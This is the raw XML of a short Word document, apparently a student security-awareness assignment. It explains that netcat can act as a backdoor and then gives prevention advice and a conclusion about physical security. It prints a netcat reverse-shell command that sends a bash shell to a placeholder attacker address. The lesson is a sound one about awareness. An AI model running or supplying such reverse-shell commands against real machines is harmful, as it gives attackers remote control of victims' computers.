        <w:t xml:space="preserve">Netcat can act as a backdoor by creating a connection between the victim and attacker. With a single command </w:t>
      </w:r>
      <w:r w:rsidRPr="008613FB">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008613FB">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>nc -e /bin/bash attacker_ip 60000</w:t>
      </w:r>
      <w:r w:rsidRPr="008613FB">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, the attacker can get a shell on the victim’s computer — functioning as a simple trojan horse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F265C7B" w14:textId="77777777" w:rsidR="00466CEC" w:rsidRPr="00466CEC" w:rsidRDefault="00466CEC" w:rsidP="00466CEC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>Always lock your screen when away, never leave your device unattended, use strong passwords and MFA, and avoid running unknown scripts or commands. Regular updates, antivirus software, and firewalls also help detect or block unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140F9F81" w14:textId="1A6B8BE6" w:rsidR="00BA14A2" w:rsidRPr="00466CEC" w:rsidRDefault="00466CEC" w:rsidP="00466CEC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>This activity shows how small, simple tools can cause large impacts if basic physical security is ignored. Awareness and good habits are the best protection.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BA14A2" w:rsidRPr="00466CEC">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80B19" w14:textId="77777777" w:rsidR="00DA0449" w:rsidRDefault="00DA0449" w:rsidP="006C5A98">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="60A4560B" w14:textId="77777777" w:rsidR="00DA0449" w:rsidRDefault="00DA0449" w:rsidP="006C5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H SarabunPSK">
    <w:panose1 w:val="020B0500040200020003"/>
    <w:charset w:val="DE"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="01000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0001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57317" w14:textId="77777777" w:rsidR="00DA0449" w:rsidRDefault="00DA0449" w:rsidP="006C5A98">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61341FF6" w14:textId="77777777" w:rsidR="00DA0449" w:rsidRDefault="00DA0449" w:rsidP="006C5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3D629" w14:textId="0FDF3A2D" w:rsidR="006C5A98" w:rsidRPr="006C5A98" w:rsidRDefault="006C5A98" w:rsidP="006C5A98">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="006C5A98">
      <w:rPr>
        <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Chayanin Kongsareekul 6532035021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7F"/>
    <w:rsid w:val="0008104A"/>
    <w:rsid w:val="000C77B7"/>
    <w:rsid w:val="002242EA"/>
    <w:rsid w:val="00466CEC"/>
    <w:rsid w:val="00503C53"/>
    <w:rsid w:val="00654C73"/>
    <w:rsid w:val="006C5A98"/>
    <w:rsid w:val="0072124E"/>
    <w:rsid w:val="00746010"/>
    <w:rsid w:val="007555F4"/>
    <w:rsid w:val="007640CD"/>
    <w:rsid w:val="008613FB"/>
    <w:rsid w:val="00981BCB"/>
    <w:rsid w:val="00B34FBF"/>
    <w:rsid w:val="00BA14A2"/>
    <w:rsid w:val="00CF6C7F"/>
    <w:rsid w:val="00D15452"/>
    <w:rsid w:val="00DA0449"/>
    <w:rsid w:val="00DE2E6F"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="en-TH" w:eastAsia="ja-JP" w:bidi="th-TH"/>
  <w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="0FE00DAC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AA298D95-EC61-3D47-9383-61A10D9E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TH" w:eastAsia="ja-JP"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CF6C7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F6C7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F6C7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F6C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C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C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C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C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C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C7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F6C7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F6C7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F6C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C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C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C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C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C7F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CF6C7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F6C7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F6C7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F6C7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F6C7F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CF6C7F"/>
    <w:rPr>
      <w:rFonts w:cs="Angsana New"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CF6C7F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CF6C7F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CF6C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C7F"/>
    <w:rPr>
      <w:rFonts w:cs="Angsana New"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CF6C7F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00466CEC"/>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466CEC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00466CEC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C5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98"/>
    <w:rPr>
      <w:rFonts w:cs="Angsana New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C5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98"/>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Chayanin Kongsareekul</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chayanin Kongsareekul</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-21T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-21T03:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>